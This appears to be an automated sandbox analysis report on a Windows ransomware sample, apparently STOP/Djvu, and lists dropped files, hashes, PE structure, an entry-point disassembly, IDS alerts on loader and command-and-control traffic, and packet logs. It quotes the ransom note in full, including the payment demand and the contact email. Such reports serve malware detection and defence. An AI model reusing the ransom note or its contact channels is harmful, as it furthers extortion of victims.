                              Preview:..[*W.E@.'............m3:...d.l.9.....`.P....=...b...a|..K.%.?.y..?$..K..$.iq .zF..I......@e..u.O..T....ZDH....7W.......#.6$...%@.;)..[...C..u$.@4..o.F...ZXp..T.C.Y...D|..z}.r..j..Q..c+..)I.}.8.FX`.....s.C*...'7|...mi...&|>e...b.$.....=Yr.Py%..o..r...Y....8...^......._.4"j.c..;..l.x...j...h.V..z.@!..2..1..p[..lL..l.......cK.....AH;....$j`../>..9..........|..bN.~._E..k.v....8....m...W]X.*.<.._...L.w.l.....EO...._...,f.8p.h.O...{..V.H4iM7....M:..N..G.q..l...|..TF..3F&...5.h5...(.s..r........)....^b.-;.mSYG..3.sl..'..S.{.a..v.D,!.Z..'#_-l@s....oA..3V.6..O.....u..L..V.b.Yc.IU...mc.v..>."(..Q...&v...a.8uF..v62..9).WY<A....f4I..m.O...q.J"..O[w...%T.9.K..Ht}}.O..ut.(m.o...A."....]....e....Z..Q.r...U.U.E..w.pm...N,....OEwj.:..rZK......R.Cr..Jb.N[.......#..@..D..=s...rQ.c..j.i...O......c..qg.j..@..j........#;"..0.&U......w.B..y.8.t...n.rw...W..=FA..KN.i..3tX..^..}..........?.I.4.[Lu......'.(Zv3pNdLH1399769YerBBKCxHURRAqLhaXsGw3Fbkt1{36A698
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1193
                              Entropy (8bit):7.81570139095227
                              Encrypted:false
                              SSDEEP:24:WpQvhNqbII7Cy2ixJ5RAiov3kmkdrmJRTYLnZxbD:WpQpUIBi35RJ0km9J6ZhD
                              MD5:5D25DE79615686DAA109ADAD095C377A
                              SHA1:F214B09A9264552A60A7191BFB495BE31D1B2592
                              SHA-256:E491AA5CF7D35258933E3413F3B5053B27F47C9871F901BFDD135628035256ED
                              SHA-512:DFA33E66BB0EBB2D199517133BDE5FEF484FA82095B33897B116AEFB1F465AD10BC2A091AA01BA750E4774D9555CCB9DF927C88DB085C9E522C5B8BB73FAD3FA
                              Malicious:false
                              Preview:<?xml9</...mh...BWSg..4U.......W.XI./.`.......Z.xfl...... ..U)q.e.,..I...9...........8..u.E.....cE...\A..(m..*...z'.J.m'A"W......W*/.3..8..|Dl..kf3.Pm.G.....,.2...u......U...y.R~K......d..if.....&..P....&...\y..........+..{b.6.t..._8..\'D....(..5rK.O.H..v..l.~..+kG1...AV.6....s....`j.`.H.....E.mj.....:Hp..I..B...0Xw1...i}r.......z..........z@U.`.........6.`59).).;B_...O....V.A.py......k6.&........m...E..O.....`.6......(..4...)_4....x.L9...2..6..@b....-...G.MJ7..n...}.Vl..D....\.._@x...C.vp.9...V.%....6..}.....x,..a.3....)c,.t9sY.......2...cs.{..DO........Z...oc...........m.[)........R..3t.......j.!..<YL...;\Si..+t..|.0...v.=..J.n1:.;R......f.K.#U..0...;7.!5.;.}T......a.P.)Sq.H.......\..+....V.....q.=..n..x3...t.z".RI..j.....s.H.y~,.UA.1..6..(.R..z.<t..k.J.@T...7..fE..............mB...../....2.......~..h8%...Q.~..[:..@r~.-...i.#....&b..F...D.."..s.6..r..W_..iv.S.Z..:9].d...7V...&G.....p....s;'.>..):.{j..c.^0...o.Z.G.).0L...............S.
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1193
                              Entropy (8bit):7.81570139095227
                              Encrypted:false
                              SSDEEP:24:WpQvhNqbII7Cy2ixJ5RAiov3kmkdrmJRTYLnZxbD:WpQpUIBi35RJ0km9J6ZhD
                              MD5:5D25DE79615686DAA109ADAD095C377A
                              SHA1:F214B09A9264552A60A7191BFB495BE31D1B2592
                              SHA-256:E491AA5CF7D35258933E3413F3B5053B27F47C9871F901BFDD135628035256ED
                              SHA-512:DFA33E66BB0EBB2D199517133BDE5FEF484FA82095B33897B116AEFB1F465AD10BC2A091AA01BA750E4774D9555CCB9DF927C88DB085C9E522C5B8BB73FAD3FA
                              Malicious:false
                              Preview:<?xml9</...mh...BWSg..4U.......W.XI./.`.......Z.xfl...... ..U)q.e.,..I...9...........8..u.E.....cE...\A..(m..*...z'.J.m'A"W......W*/.3..8..|Dl..kf3.Pm.G.....,.2...u......U...y.R~K......d..if.....&..P....&...\y..........+..{b.6.t..._8..\'D....(..5rK.O.H..v..l.~..+kG1...AV.6....s....`j.`.H.....E.mj.....:Hp..I..B...0Xw1...i}r.......z..........z@U.`.........6.`59).).;B_...O....V.A.py......k6.&........m...E..O.....`.6......(..4...)_4....x.L9...2..6..@b....-...G.MJ7..n...}.Vl..D....\.._@x...C.vp.9...V.%....6..}.....x,..a.3....)c,.t9sY.......2...cs.{..DO........Z...oc...........m.[)........R..3t.......j.!..<YL...;\Si..+t..|.0...v.=..J.n1:.;R......f.K.#U..0...;7.!5.;.}T......a.P.)Sq.H.......\..+....V.....q.=..n..x3...t.z".RI..j.....s.H.y~,.UA.1..6..(.R..z.<t..k.J.@T...7..fE..............mB...../....2.......~..h8%...Q.~..[:..@r~.-...i.#....&b..F...D.."..s.6..r..W_..iv.S.Z..:9].d...7V...&G.....p....s;'.>..):.{j..c.^0...o.Z.G.).0L...............S.
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1383
                              Entropy (8bit):7.855471927620737
                              Encrypted:false
                              SSDEEP:24:Le1WciyQxw9SS9nLMbRnDWPLEXu2zqMOTrwn0xxzjBCHURkF+S+D+tSBLv+dbZpf:LeE1AtSZD0Lodz6kWPB8UaFLEmdPZhD
                              MD5:B4ED2A86E87E642181592512EFD42662
                              SHA1:AD6A695D7A88795D52C9C5F55B3DEA267D179A8A
                              SHA-256:BDF878DC6A39429FE6AA3E44253BD3F9E6A865218E1290043DE04D82D47D5AC4
                              SHA-512:4C97753848B4F65ED48EF8B89724BA7CE1D62CCE8D2572AAD88CA666FBF804E492B1AA47FC095214A281E3477470D2C6A5748B1FC16BA80BD79F5BD9F8509C76
                              Malicious:false
                              Preview:L....Ob.@......P...n,...CEP..`...)..l .b8.k.Tt9s....h.T....].i{Pj.r.q.$.FA..^....om_..D..H..m....I......H7W...E....g.<.Bn.rZ..1z....~.^.]T..-.*...<....l;D.,.h\..@-.?th..f'...yfK%.@e..._V..Ju.C..`.n^s.6..>..~...Q.Ev...p...I..}D&.l.<....9...Ng.......T....~.6...T..4\f;e.....2....h..Yg.L.!g[D...Y#...I..o.....9#.3'C.?...j,O..zQ....k.g.....)."............_.f5.C}y9..=.A...^....k.dvzy...B.{.F...K{.=..P. >.hr8c..U.i.@..uV{.q.}..}..../.......bb..k.....BW....oF......w ....3..1'.mr.(.......p.,...t.....8&p.....>..Q....Cx>.\.O...V.)..P.16k2?.......u7......yReX..`...e...L.$...B.u.F.!.0..7.V.f&...y6..;...X.yX.~y..W..@.i..h.T..p...A....[..4.N....')..N..@y...@e....k...H~!e9.b.6Cs....?c....)L!.Y:.y.!....O....<;....u.~.a.-......+..'..._-..Q........".. W!q.q......#zv;.g:L".X.6.H.....|/$j%...h{.=...u....\c....J.q..mp.He....cu.H.......>....Y'..4:.)nuzVM.t.o.yX-.>zS..N.H..2..<V^).I.m.5.?.>W.......DE....:.lQ>.<C....Q..t.0.l.I..g..%..3.T...\f.R.......Mx......!.I!rZ...
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):341
                              Entropy (8bit):7.341368857104536
                              Encrypted:false
                              SSDEEP:6:REKq8W7i3oiG32c9QFEHerFs3PI3WPtexNhOtxiYUcgBDDxnZcWcii96Z:6Io1J9QFyerCA3WP2hODiYUZDtnZxciD
                              MD5:119F35E8CBE62CA0C4A9B5FA21AA3283
                              SHA1:F19DBA9F08C47E93C118917DDA889FE7E3772786
                              SHA-256:57ACF7E2ED2F94A7716364DFFB8461778F7AD11598E75BDD4DCC7DDAC7237742
                              SHA-512:3E4A662078715BFE9D15102E53CC04AC0617FAAEA16451D22D6DD0C4AA58B1E06BE6E1BF021314D4389E8B2CFF7823EE42FB5124EB8639CAA4448F6FB63C3677
                              Malicious:false
                              Preview:deskt .YV'&...i..-=../......I;...tg.....1.>.._%x.d.:Un[C..@..R...Y.K.K..^....ycp.G....)i.}....V.V..<'..W.sJ.^.......A......"{V.A|.gu...Qe.}Ap...I1.k.$..@.l.g....8.m2.....A...-....3I#......h......(.....^...}.......S.?W9...".d.....~(r.|?:...j3pNdLH1399769YerBBKCxHURRAqLhaXsGw3Fbkt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1104
                              Entropy (8bit):4.893245966380744
                              Encrypted:false
                              SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYLuWs7mFRqrl3W4kA+GT/kF5M2/kh7HFJhtnZd:WZHfv0p6WsPFWrDGT0f/kRFNZd
                              MD5:6769456FD1CE9C5E1B30A7C4B3D6BC0C
                              SHA1:6B2A667A27CC056CE90AD156B2A71DA4D71A1496
                              SHA-256:92C03AFD5BFE65DB7A98A764CB662B87F1B3D6B3FA1B6CA92A1C92B9725135F0
                              SHA-512:A164F6E0D38B4F54829912E10F7EE66818A9028801B5902B707AC734F111A395F7F35485295497251FBE2E978BBA38556B742178EF7FF68C09D2B822E9BCDA48
                              Malicious:true
                              Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...You can get and look video overview decrypt tool:..https://we.tl/t-TVrnNufMGq..Price of private key and decrypt software is $980...Discount 50% available if you contact us first 72 hours, that's price for you is $490...Please note that you'll never restore your data without payment...Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.......To get this software you need write on our e-mail:..helpteam@mail.ch....Reserve e-mail address to co
                              Process:C:\Users\user\Desktop\tsnsd8pOvn.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1104
                              Entropy (8bit):4.893245966380744
                              Encrypted:false
                              SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYLuWs7mFRqrl3W4kA+GT/kF5M2/kh7HFJhtnZd:WZHfv0p6WsPFWrDGT0f/kRFNZd
                              MD5:6769456FD1CE9C5E1B30A7C4B3D6BC0C
                              SHA1:6B2A667A27CC056CE90AD156B2A71DA4D71A1496
                              SHA-256:92C03AFD5BFE65DB7A98A764CB662B87F1B3D6B3FA1B6CA92A1C92B9725135F0
                              SHA-512:A164F6E0D38B4F54829912E10F7EE66818A9028801B5902B707AC734F111A395F7F35485295497251FBE2E978BBA38556B742178EF7FF68C09D2B822E9BCDA48
                              Malicious:true
                              Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...You can get and look video overview decrypt tool:..https://we.tl/t-TVrnNufMGq..Price of private key and decrypt software is $980...Discount 50% available if you contact us first 72 hours, that's price for you is $490...Please note that you'll never restore your data without payment...Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.......To get this software you need write on our e-mail:..helpteam@mail.ch....Reserve e-mail address to co
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.699993100423124
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.55%
                              • Win32 EXE PECompact compressed (generic) (41571/9) 0.41%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:tsnsd8pOvn.exe
                              File size:820'736 bytes
                              MD5:04e42207db45792cae0f6d3fd83f0680
                              SHA1:cb17f3a1bb57541204afd27313b390e5ead5096c
                              SHA256:b377b7b8211e454117ba3d6cd6bb1ac84c0105c8647187cb5cf19ad50c9d26b9
                              SHA512:b81da4e8961bc8c25e6832db5c1227cb253e178e6c5a4db0725ed073639d944b8d8012865ace42b2781b3f09b082e44a8a19c2ee326a173acb8757caebacbbf7
                              SSDEEP:24576:7oL6YwH+hUfoA5snjj0ZvgCxwaEbNHzy9XSm3XNEGQnA:cL6Yw2UfoOoEwaONQXHNEGe
                              TLSH:9305F130AAA0C034E5B715F04CBF83B8B53D7EA19B6490FB61D56EEA16346E49C31B47
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........L.p...p...p..."4..p...""..p..."%..p.......p...p...p..."+..p..."5..p..."0..p..Rich.p..........PE..L......^...................
                              Icon Hash:251b7a64b1051111
                              Entrypoint:0x402020
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:TERMINAL_SERVER_AWARE
                              Time Stamp:0x5E9B9481 [Sun Apr 19 00:00:01 2020 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:0
                              File Version Major:5
                              File Version Minor:0
                              Subsystem Version Major:5
                              Subsystem Version Minor:0
                              Import Hash:a09ba88638e365d2730477a4bfd803f0
                              Instruction
                              mov edi, edi
                              push ebp
                              mov ebp, esp
                              call 00007FBD11012B7Bh
                              call 00007FBD11008A96h
                              pop ebp
                              ret
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              int3
                              mov edi, edi
                              push ebp
                              mov ebp, esp
                              push FFFFFFFEh
                              push 004272C0h
                              push 00407450h
                              mov eax, dword ptr fs:[00000000h]
                              push eax
                              add esp, FFFFFF94h
                              push ebx
                              push esi
                              push edi
                              mov eax, dword ptr [00429A60h]
                              xor dword ptr [ebp-08h], eax
                              xor eax, ebp
                              push eax
                              lea eax, dword ptr [ebp-10h]
                              mov dword ptr fs:[00000000h], eax
                              mov dword ptr [ebp-18h], esp
                              mov dword ptr [ebp-70h], 00000000h
                              mov dword ptr [ebp-04h], 00000000h
                              lea eax, dword ptr [ebp-60h]
                              push eax
                              call dword ptr [00420154h]
                              mov dword ptr [ebp-04h], FFFFFFFEh
                              jmp 00007FBD11008AA8h
                              mov eax, 00000001h
                              ret
                              mov esp, dword ptr [ebp-18h]
                              mov dword ptr [ebp-78h], 000000FFh
                              mov dword ptr [ebp-04h], FFFFFFFEh
                              mov eax, dword ptr [ebp-78h]
                              jmp 00007FBD11008BD7h
                              mov dword ptr [ebp-04h], FFFFFFFEh
                              call 00007FBD11008C14h
                              mov dword ptr [ebp-6Ch], eax
                              push 00000001h
                              call 00007FBD110140BAh
                              add esp, 04h
                              test eax, eax
                              jne 00007FBD11008A8Ch
                              push 0000001Ch
                              call 00007FBD11008BCCh
                              add esp, 04h
                              call 00007FBD1100D0B4h
                              test eax, eax
                              jne 00007FBD11008A8Ch
                              push 00000010h
                              Programming Language:
                              • [ASM] VS2008 build 21022
                              • [ C ] VS2008 build 21022
                              • [C++] VS2008 build 21022
                              • [IMP] VS2005 build 50727
                              • [RES] VS2008 build 21022
                              • [LNK] VS2008 build 21022
                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x279f80x3c.rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xce0000xae78.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x202a00x1c.rdata
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x270b00x40.rdata
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x200000x24c.rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000x1e9a00x1ea0022d4b0b487c313f693b1f72a964f695cFalse0.4570232780612245data6.262580943386606IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rdata0x200000x87700x8800b8644a31f522fc0f08b9260ec6d66da5False0.2925379136029412data4.822598839841113IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data0x290000xa4ee80x9600068f58e5ef5e899b63dd2247283a8cac9False0.96875data7.931848158465569IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc0xce0000xae780xb000c1338247566b23c28f40def10b9eff0bFalse0.5241033380681818data5.620829032954194IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              CIPINANIVEGOWENA0xd6b680x470ASCII text, with very long lines (1136), with no line terminatorsTatarRussia0.6197183098591549
                              JORUZAZOHEBAJEXEYECOYEMUFOVIWIPU0xd4e480x6c5ASCII text, with very long lines (1733), with no line terminatorsTatarRussia0.6099249855741489
                              MEMOH0xd55100x127bASCII text, with very long lines (4731), with no line terminatorsTatarRussia0.5928979074191503
                              WETEBIPEREXIBUBUVEWOSEMA0xd67900x3d8ASCII text, with very long lines (984), with no line terminatorsTatarRussia0.6321138211382114
                              RT_CURSOR0xd70300x134Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"TatarRussia0.75
                              RT_CURSOR0xd71800x130Device independent bitmap graphic, 32 x 64 x 1, image size 0TatarRussia0.42105263157894735
                              RT_CURSOR0xd72b00xf0Device independent bitmap graphic, 24 x 48 x 1, image size 0TatarRussia0.4375
                              RT_CURSOR0xd73a00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TatarRussia0.0898217636022514
                              RT_ICON0xce6100xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.4211087420042644
                              RT_ICON0xcf4b80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.5970216606498195
                              RT_ICON0xcfd600x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0EnglishUnited States0.6762672811059908
                              RT_ICON0xd04280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.7442196531791907
                              RT_ICON0xd09900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.516286307053942
                              RT_ICON0xd2f380x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.6641651031894934
                              RT_ICON0xd3fe00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0EnglishUnited States0.6987704918032787
                              RT_ICON0xd49680x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.8129432624113475
                              RT_STRING0xd85c00x310Matlab v4 mat-file (little endian) u, numeric, rows 0, columns 0TatarRussia0.4719387755102041
                              RT_STRING0xd88d00x5a4dataTatarRussia0.4376731301939058
                              RT_ACCELERATOR0xd6fd80x58dataTatarRussia0.7954545454545454
                              RT_GROUP_CURSOR0xd71680x14Lotus unknown worksheet or configuration, revision 0x1TatarRussia1.3
                              RT_GROUP_CURSOR0xd84480x30dataTatarRussia1.0
                              RT_GROUP_ICON0xd4dd00x76dataEnglishUnited States0.6610169491525424
                              RT_VERSION0xd84780x144dataTatarRussia0.5987654320987654
                              DLLImport
                              KERNEL32.dllGetSystemDefaultLangID, ExitProcess, GetCommandLineW, GetPrivateProfileSectionNamesW, GlobalFix, SearchPathW, OpenFile, lstrlenA, WritePrivateProfileStructA, CopyFileExW, GetDriveTypeW, DebugActiveProcessStop, SetEndOfFile, BuildCommDCBAndTimeoutsA, LoadResource, SystemTimeToTzSpecificLocalTime, DeleteVolumeMountPointA, ScrollConsoleScreenBufferW, SetConsoleActiveScreenBuffer, SetHandleInformation, GetProfileStringW, GetProfileSectionA, GetUserDefaultLCID, SetComputerNameW, AddConsoleAliasW, FlushConsoleInputBuffer, GetProcessPriorityBoost, IsBadReadPtr, EnumTimeFormatsW, TlsSetValue, GlobalAlloc, GetPrivateProfileIntA, GetVolumeInformationA, LoadLibraryW, GetConsoleMode, GetSystemPowerStatus, GlobalFlags, HeapCreate, GetFileAttributesW, GetBinaryTypeA, GetTimeZoneInformation, GetConsoleFontSize, GetOverlappedResult, DisconnectNamedPipe, RaiseException, DeactivateActCtx, CreateJobObjectA, GetConsoleOutputCP, VerifyVersionInfoW, FreeLibraryAndExitThread, OpenMutexW, GetLastError, GetCurrentDirectoryW, SetLastError, GetProcAddress, VirtualAlloc, CreateNamedPipeA, SetVolumeLabelW, LocalLock, MoveFileW, CopyFileA, GetConsoleDisplayMode, EnterCriticalSection, GetTempFileNameA, GetLocalTime, OpenThread, WriteConsoleA, OpenWaitableTimerW, SetFileApisToANSI, SetCommMask, GetTapeParameters, WaitForMultipleObjects, SetSystemTime, SetEnvironmentVariableA, GlobalWire, GetOEMCP, WriteProfileStringA, GetModuleHandleA, RequestWakeupLatency, GetConsoleCursorInfo, OpenSemaphoreW, GetVersionExA, lstrcpyA, WideCharToMultiByte, MoveFileA, GetStartupInfoW, HeapValidate, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, GetModuleFileNameW, InterlockedIncrement, InterlockedDecrement, GetACP, GetCPInfo, IsValidCodePage, TlsGetValue, GetModuleHandleW, TlsAlloc, GetCurrentThreadId, TlsFree, LeaveCriticalSection, DeleteCriticalSection, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, Sleep, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, HeapDestroy, HeapFree, VirtualFree, GetModuleFileNameA, WriteFile, HeapAlloc, HeapSize, HeapReAlloc, DebugBreak, OutputDebugStringA, WriteConsoleW, OutputDebugStringW, RtlUnwind, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, SetFilePointer, GetConsoleCP, InitializeCriticalSectionAndSpinCount, LoadLibraryA, FlushFileBuffers, ReadFile, SetStdHandle, CloseHandle, CreateFileA
                              USER32.dllGetWindowInfo
                              Language of compilation systemCountry where language is spokenMap
                              TatarRussia
                              EnglishUnited States
                              TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                              2024-08-26T23:32:41.298785+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH25264880192.168.2.692.246.89.93
                              2024-08-26T23:32:41.298785+0200TCP2018581ET MALWARE Single char EXE direct download likely trojan (multiple families)15264880192.168.2.692.246.89.93
                              2024-08-26T23:32:41.298785+0200TCP2020826ET MALWARE Potential Dridex.Maldoc Minimal Executable Request15264880192.168.2.692.246.89.93
                              2024-08-26T23:32:41.298785+0200TCP2036333ET MALWARE Win32/Vodkagats Loader Requesting Payload15264880192.168.2.692.246.89.93
                              2024-08-26T23:32:03.640222+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH25264080192.168.2.692.246.89.93
                              2024-08-26T23:31:17.409857+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH249716443192.168.2.6188.114.97.3
                              2024-08-26T23:32:58.064861+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH25265180192.168.2.692.246.89.93
                              2024-08-26T23:32:58.064861+0200TCP2833438ETPRO MALWARE STOP Ransomware CnC Activity15265180192.168.2.692.246.89.93
                              2024-08-26T23:31:15.144397+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH249712443192.168.2.6188.114.97.3
                              2024-08-26T23:32:56.445703+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH25265080192.168.2.692.246.89.93
                              2024-08-26T23:32:56.445703+0200TCP2036334ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key15265080192.168.2.692.246.89.93
                              2024-08-26T23:31:37.065347+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24971480192.168.2.692.246.89.93
                              2024-08-26T23:33:02.658754+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH25265280192.168.2.692.246.89.93
                              2024-08-26T23:33:02.658754+0200TCP2018581ET MALWARE Single char EXE direct download likely trojan (multiple families)15265280192.168.2.692.246.89.93
                              2024-08-26T23:33:02.658754+0200TCP2020826ET MALWARE Potential Dridex.Maldoc Minimal Executable Request15265280192.168.2.692.246.89.93
                              2024-08-26T23:33:02.658754+0200TCP2036333ET MALWARE Win32/Vodkagats Loader Requesting Payload15265280192.168.2.692.246.89.93
                              2024-08-26T23:31:38.858740+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24971780192.168.2.692.246.89.93
                              2024-08-26T23:31:38.858740+0200TCP2833438ETPRO MALWARE STOP Ransomware CnC Activity14971780192.168.2.692.246.89.93
                              2024-08-26T23:31:34.643947+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH252638443192.168.2.6188.114.97.3
                              2024-08-26T23:32:30.047078+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH25264580192.168.2.692.246.89.93
                              2024-08-26T23:31:58.536295+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH25263980192.168.2.692.246.89.93
                              2024-08-26T23:31:58.536295+0200TCP2020826ET MALWARE Potential Dridex.Maldoc Minimal Executable Request15263980192.168.2.692.246.89.93
                              2024-08-26T23:31:58.536295+0200TCP2036333ET MALWARE Win32/Vodkagats Loader Requesting Payload15263980192.168.2.692.246.89.93
                              2024-08-26T23:32:05.302518+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH25264180192.168.2.692.246.89.93
                              2024-08-26T23:32:05.302518+0200TCP2833438ETPRO MALWARE STOP Ransomware CnC Activity15264180192.168.2.692.246.89.93
                              2024-08-26T23:30:59.584547+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH25265480192.168.2.692.246.89.93
                              2024-08-26T23:30:59.584547+0200TCP2018581ET MALWARE Single char EXE direct download likely trojan (multiple families)15265480192.168.2.692.246.89.93
                              2024-08-26T23:30:59.584547+0200TCP2020826ET MALWARE Potential Dridex.Maldoc Minimal Executable Request15265480192.168.2.692.246.89.93
                              2024-08-26T23:30:59.584547+0200TCP2036333ET MALWARE Win32/Vodkagats Loader Requesting Payload15265480192.168.2.692.246.89.93
                              2024-08-26T23:31:27.641342+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH252636443192.168.2.6188.114.97.3
                              2024-08-26T23:32:31.658617+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH25264680192.168.2.692.246.89.93
                              2024-08-26T23:32:31.658617+0200TCP2833438ETPRO MALWARE STOP Ransomware CnC Activity15264680192.168.2.692.246.89.93
                              2024-08-26T23:32:19.926942+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH25264380192.168.2.692.246.89.93
                              2024-08-26T23:32:19.926942+0200TCP2020826ET MALWARE Potential Dridex.Maldoc Minimal Executable Request15264380192.168.2.692.246.89.93
                              2024-08-26T23:32:19.926942+0200TCP2036333ET MALWARE Win32/Vodkagats Loader Requesting Payload15264380192.168.2.692.246.89.93
                              2024-08-26T23:31:09.086681+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH249711443192.168.2.6188.114.97.3
                              2024-08-26T23:31:37.061694+0200TCP2803274ETPRO MALWARE Common Downloader Header Pattern UH24971380192.168.2.692.246.89.93
                              2024-08-26T23:31:37.061694+0200TCP2020826ET MALWARE Potential Dridex.Maldoc Minimal Executable Request14971380192.168.2.692.246.89.93
                              2024-08-26T23:31:37.061694+0200TCP2036333ET MALWARE Win32/Vodkagats Loader Requesting Payload14971380192.168.2.692.246.89.93
                              TimestampSource PortDest PortSource IPDest IP
                              Aug 26, 2024 23:31:08.172853947 CEST49711443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:08.172904015 CEST44349711188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:08.172983885 CEST49711443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:08.185420990 CEST49711443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:08.185448885 CEST44349711188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:08.669383049 CEST44349711188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:08.669466019 CEST49711443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:08.727269888 CEST49711443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:08.727308035 CEST44349711188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:08.727667093 CEST44349711188.114.97.3192.168.2.6
                              Aug 26, 2024 23:31:08.727727890 CEST49711443192.168.2.6188.114.97.3
                              Aug 26, 2024 23:31:08.731409073 CEST49711443192.168.2.6188.114.97.3
